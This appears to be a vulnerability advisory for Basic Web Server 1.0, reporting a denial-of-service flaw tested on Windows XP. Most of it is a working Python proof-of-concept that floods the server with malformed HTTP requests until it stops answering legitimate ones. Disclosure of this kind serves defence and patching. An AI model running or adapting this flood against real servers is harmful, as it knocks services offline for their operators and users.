Search
Software Vulnerability Tested On Date
Basic Web Server 1.0 Denial Of Service Windows XP 9/16/2010
Description
Flooding the server with malformed HTTP requests results in the server failing to respond to legitimate requests.
Proof of Concept
import socket

host = 'testbox'
port = 80

include_file = True
complete_path = True

try:
    for i in range(0, 1024):

        for x in range(0, 8):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.settimeout(2)
            s.send('GET http:/// HTTP/1.1\r\n'
                   'Host: ' + host + '\r\n\r\n')
            print '.',

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(2)
        s.send('GET / HTTP/1.1\r\n'
               'Host: ' + host + '\r\n\r\n')
        s.recv(8192)

        print 'response received'
except:
    print 'error contacting server'